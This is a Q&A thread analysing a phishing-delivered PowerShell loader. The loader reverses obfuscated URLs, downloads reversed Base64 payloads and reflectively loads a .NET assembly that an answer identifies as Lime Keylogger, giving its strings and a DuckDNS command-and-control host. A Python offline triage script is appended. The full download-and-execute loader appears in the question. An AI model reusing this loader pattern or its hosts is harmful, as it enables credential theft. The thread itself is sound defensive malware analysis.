
Recently a relative received a phishing email with an encrypted code. Even though I do not know that much about it, I tried to review what the script did in order to revert whatever was done. In the end, it translated into the few lines of code below; I believe it's .NET and it's trying to download a set of commands to be run on the local machine. The code is the following:

$dll = '0/L00dc/r/ee.etsap//:sptth';
$RumpeD = (New-Object Net.WebClient).DownloadString( $dll[-1..-$dll.Length] -join '' );
$Fi = 'txt.34612474295/sbv/erots.sbvle//:ptth';
$FiRe = (New-Object Net.WebClient).DownloadString( $Fi[-1..-$Fi.Length] -join '' );
[Byte[]] $Rumpe = [System.Convert]::FromBase64String( $RumpeD[-1..-$RumpeD.Length] -join '' );
[Byte[]] $server = [System.Convert]::FromBase64String( $FiRe[-1..-$FiRe.Length] -join '' );
[Reflection.Assembly]::Load($Rumpe).GetType('sst.Class2').GetMethod('Run').Invoke($null, [object[]] ('C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe', $server))

When I try to see the values of $Rumpe and $server, it returns a set of strings that I do not understand. Those strings look like \x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08. Can someone please translate what $Rumpe and $server are trying to do? If I have not tagged the question well, I would appreciate help pointing that out. I appreciate the help. Thanks

I understand no one would like to download malicious code, so, to visualize the lines, I created a Python script that returns the unknown set of strings without the danger of executing them:

import base64

def decode(coded):
    return base64.b64decode(coded)

encoded1 = r'...'  # the Base64 text copied from the paste (omitted from the post)
decoded = decode(encoded1)

I try to decode the resulting string with the code:

decodedlist=decoded.split()
for string in decodedlist:
    stringdecoded=str(string,'ascii')
    print(stringdecoded)

but it gave me errors.

  • I don't think anyone is willing to download malicious code just to figure out what it actually does to your machine... – Theo Nov 06 '20 at 13:36
  • Not a coding problem. Probably malicious code. – marsze Nov 06 '20 at 13:39
  • You might have better luck at [Security.SE](https://security.stackexchange.com/). The code, which I don't care to download, attempts to install a .Net assembly. That likely contains malware. – vonPryz Nov 06 '20 at 13:43
  • I appreciate your comments, I updated the question with the lines I already downloaded in a closed virtual environment. These lines are just strings to be reviewed but can't run – Henry A. Norza Nov 06 '20 at 13:46
  • Try to disassemble the string with IL Disassembler (ildasm). Or even better, decompile it with ILSpy. – Dialecticus Nov 06 '20 at 13:49
  • @HenryA.Norza Try writing `$Rumpe` and `$Server` to disk (ie. `Set-Content -Path .\malware-sample $Rumpe -Encoding Byte`), then upload the file to VirusTotal (assuming your local AV doesn't intercept it) – Mathias R. Jessen Nov 06 '20 at 13:49
  • Since it's a .Net assembly, the result is not going to be a human-readable string but a binary. Save that one onto disk and try ildasm. – vonPryz Nov 06 '20 at 13:53
  • Here's a sample of how to [write binary](https://stackoverflow.com/q/47580772/503046) files from Base64 string data in Python. – vonPryz Nov 06 '20 at 14:25
  • https://www.virusradar.com/en/MSIL_Bladabindi/detail – CraftyB Nov 06 '20 at 17:10

1 Answer

It's, at minimum, a keylogger.

The code you see is just reversed HTTP links that lead to reversed Base64-encoded byte arrays.

Here's some info I pulled from it:

<Module> Clie.exe Program Lime Keylogger mscorlib System Object host port registryName splitter victimName version System.Threading Mutex stubMutex System.IO FileInfo currentAssemblyFileInfo keylogger isConnected System.Net.Sockets TcpClient tcpSocket MemoryStream memoryStream bytesArray lastCapturedImage currentPlugin Main Start DeleteValueFromRegistry GetValueFromRegistry Microsoft.Win32 RegistryValueKind SaveValueOnRegistry GetInfo StringToBase64 Base64ToString StringToBytes BytesToString DecompressGzip SearchForCam GetForegroundWindowTitle GetHWID Plugin Uninstall HandleData CreateHash Send Connect Receive NtSetInformationProcess capGetDriverDescriptionA GetVolumeInformation GetForegroundWindow GetWindowText GetWindowTextLength .ctor System.Text StringBuilder ToUnicodeEx GetKeyboardState MapVirtualKey GetWindowThreadProcessId GetKeyboardLayout GetAsyncKeyState AV VKCodeToUnicode System.Windows.Forms Keys Fix WRK LastAV LastAS lastKey Logs vn Microsoft.VisualBasic Microsoft.VisualBasic.Devices Keyboard keyboard System.Runtime.CompilerServices CompilationRelaxationsAttribute RuntimeCompatibilityAttribute Clie STAThreadAttribute Interaction Command Registry RegistryKey CurrentUser SetValue Thread Sleep Environment Exit ThreadStart Application DoEvents System.Diagnostics Process GetCurrentProcess IntPtr op_Explicit set_MinWorkingSet Microsoft.VisualBasic.CompilerServices Operators CompareString String Concat name RegistryKeyPermissionCheck CreateSubKey DeleteValue IDisposable Dispose ret OpenSubKey RuntimeHelpers GetObjectValue GetValue n t typ ConditionalCompareObjectEqual Conversions ToString get_MachineName get_UserName FileSystemInfo DateTime get_LastWriteTime get_Date Computer ServerComputer ComputerInfo get_Info get_OSFullName OperatingSystem get_OSVersion get_ServicePack Strings CompareMethod Split SpecialFolder GetFolderPath Contains GetValueNames get_Length s Convert ToBase64String FromBase64String S Encoding get_UTF8 GetBytes B GetString System.IO.Compression GZipStream Stream CompressionMode Byte set_Position Read BitConverter ToInt32 Space Zero op_Equality Environ Conversion Hex b c System.Reflection Assembly Load Module GetModules Type GetTypes get_FullName EndsWith get_Assembly CreateInstance DeleteSubKeyTree AppWinStyle Shell WaitHandle Close ConcatenateObject get_Chars Write ToArray System.Net WebClient DownloadData Path GetTempFileName File WriteAllBytes get_Name Exception get_Message ProjectData ClearProjectError NewLateBinding LateSet LateCall Boolean LateGet CompareObjectEqual OrObject ToBoolean Screen get_PrimaryScreen System.Drawing Rectangle get_Bounds get_Width get_Height Bitmap System.Drawing.Imaging PixelFormat Graphics Image FromImage Size CopyPixelOperation CopyFromScreen Cursors Cursor get_Default Point get_Position Draw SetProjectError ToInteger DrawImage ImageFormat get_Jpeg Save WriteByte RuntimeTypeHandle GetTypeFromHandle ChangeType System.Security.Cryptography MD5CryptoServiceProvider HashAlgorithm ComputeHash Monitor Enter Int32 Socket get_Client SocketFlags set_ReceiveBufferSize set_SendBufferSize set_SendTimeout set_ReceiveTimeout Empty DirectoryInfo get_Directory <Receive>b__0 ParameterizedThreadStart <>9__CachedAnonymousMethodDelegate1 CompilerGeneratedAttribute a0 get_Available SelectMode Poll Join NetworkStream GetStream ReadByte ChrW Char ToLong System.Runtime.InteropServices DllImportAttribute ntdll hProcess processInformationClass processInformation processInformationLength avicap32.dll wDriver lpszName MarshalAsAttribute UnmanagedType cbName lpszVer cbVer kernel32 GetVolumeInformationA lpRootPathName lpVolumeNameBuffer nVolumeNameSize lpVolumeSerialNumber lpMaximumComponentLength lpFileSystemFlags lpFileSystemNameBuffer nFileSystemNameSize user32.dll GetWindowTextA hWnd WinTitle MaxLength GetWindowTextLengthA hwnd .cctor get_ExecutablePath a d OutAttribute e f g user32 GetProcessById get_MainWindowTitle DateAndTime get_Now get_ProcessName k get_ShiftKeyDown get_CapsLock ToUpper ToLower get_CtrlKeyDown Remove     d i  !   a c t  S o f t w a r e \  l l  v n  _  N / A  y y - M M - d d S P 
    0  x 8 6      x 6 4       x 8 6  Y e s  N o  . .  ,  S y s t e m D r i v e  \  E R R  .  S o f t w a r e  Cc m d . e x e   / C   Y   / N   / D   Y   / T   1   &   D e l   "  "  k l    p r o f  ~  g e t v a l u e  @  r n  M S G  E x e c u 
t e   E R R O R  b l a  D o w n l o a d   E R R O R  E x e c u t e d   A s    E x e c u t e   E R R O R    i n v  p l  A  h  p  o s k  s t a r t  O f f  o f f  r e t  G T  C A P  u n  u p  U p d a t e   E R R O R    . e x e  U p d a t i n 
g   T o    U p d a t e   E R R O R    E x  P L G  i n d  H  P  c  E R  x 2     
  :  i n f  c l e a r  /j h o l e p p p p p 5 . d u c k d n s . o r g   9 5 9 5  d 7 4 f 6 8 0 0 1 6  @ ! # & ^ % $  T l l B T i B D Q V Q =  0 . 7 N C     [ k l ]   
  y y / M M / d d      
 [  ]  [ E N T E R ]  
  [ T A P ]  

How I got the above:

$dll = '0/L00dc/r/ee.etsap//:sptth'
# this led to a paste.ee page, which I manually copied into $RumpeD
$dll[-1..-$dll.Length] -join ''

$RumpeD = "copy pasta of string"

# same as above
$Fi = 'txt.34612474295/sbv/erots.sbvle//:ptth';
$Fi[-1..-$Fi.Length] -join ''

$FiRe ="copy pasta of string"

[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( $FiRe[-1..-$FiRe.Length] -join '' ))
[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( $RumpeD[-1..-$RumpeD.Length] -join '' ))

Interesting bit near the end: j h o l e p p p p p 5 . d u c k d n s . o r g

PowerShellGuy
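The asker's `.split()` loop fails because the decoded bytes are a PE file, not text, and the answer's dump shows letters separated by gaps because C# string literals are stored as UTF-16LE (every other byte is NUL). Here is an added Python script, not code from the question, the answer or the malware, that performs the same static triage offline: it undoes the `$x[-1..-$x.Length] -join ''` reversal and the Base64 step, checks for the MZ header, pulls out both ASCII and UTF-16LE strings, and defangs any recovered URL. Nothing is downloaded or executed: the payload it analyses is a small constructed stand-in built inline, and the names `unreverse`, `defang`, `triage`, `SAMPLE_BLOB` and `SAMPLE_REVERSED_B64` are my own.

```python
"""Static, offline triage of the reversed-string / Base64 PowerShell loader.

The stages the loader performs at runtime (reverse the URL, fetch, reverse the
Base64, decode, Assembly.Load) are replayed here on a constructed byte blob,
so the script runs without touching the real paste.ee / elvbs.store payloads.
"""
import base64
import re

# The two reversed URL literals exactly as they appear in the loader.
REVERSED_URLS = {
    "$dll": "0/L00dc/r/ee.etsap//:sptth",
    "$Fi": "txt.34612474295/sbv/erots.sbvle//:ptth",
}


def unreverse(s: str) -> str:
    """PowerShell's  $s[-1..-$s.Length] -join ''  is just a string reversal."""
    return s[::-1]


def defang(url: str) -> str:
    """Make a recovered URL safe to paste into a ticket or blocklist."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def decode_payload(reversed_b64: str) -> bytes:
    """Replay FromBase64String($x[-1..-$x.Length] -join '') without Load()."""
    return base64.b64decode(unreverse(reversed_b64), validate=True)


def is_pe(blob: bytes) -> bool:
    """A .NET assembly is a PE file, so it starts with the 'MZ' DOS header."""
    return blob[:2] == b"MZ"


def ascii_strings(blob: bytes, min_len: int = 4):
    """Printable runs of single-byte text (CLR metadata names are stored this way)."""
    pat = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pat, blob)]


def utf16le_strings(blob: bytes, min_len: int = 4):
    """Runs of UTF-16LE text (the CLR user-string heap). Viewed as ASCII these
    are the 'S o f t w a r e' fragments in the answer: the NUL high bytes
    render as gaps between the letters."""
    pat = rb"(?:[\x20-\x7e]\x00){%d,}" % min_len
    return [m.group().decode("utf-16-le") for m in re.finditer(pat, blob)]


def triage(reversed_b64: str) -> dict:
    """Decode the blob the loader would have fed to Assembly.Load and summarise it."""
    blob = decode_payload(reversed_b64)
    return {
        "size": len(blob),
        "is_pe": is_pe(blob),
        "ascii": ascii_strings(blob),
        "utf16": utf16le_strings(blob),
    }


# --- constructed stand-in for the downloaded payload -------------------------
# A few bytes that look like a PE header plus two embedded strings, one ASCII
# (as CLR metadata names are stored) and one UTF-16LE (as C# string literals
# are stored). This is NOT the real sample from the post; it is built here.
SAMPLE_BLOB = (
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00"
    + b"\x00" * 8
    + b"Lime Keylogger\x00\x00\x00"
    + "Software\\".encode("utf-16-le")
    + b"\x00\x00"
)
# What the loader would have received from the paste: Base64, then reversed.
SAMPLE_REVERSED_B64 = base64.b64encode(SAMPLE_BLOB).decode()[::-1]


if __name__ == "__main__":
    for var, rev in REVERSED_URLS.items():
        print(f"{var} -> {defang(unreverse(rev))}")
    report = triage(SAMPLE_REVERSED_B64)
    print(f"PE header: {report['is_pe']}, {report['size']} bytes")
    print("ASCII strings :", report["ascii"])
    print("UTF-16 strings:", report["utf16"])
```

To apply this to a real paste copied inside an isolated VM, pass the reversed text to `triage` and write `decode_payload(...)` to disk for VirusTotal or ILSpy, as the comments suggest, instead of ever calling `Load()` on it.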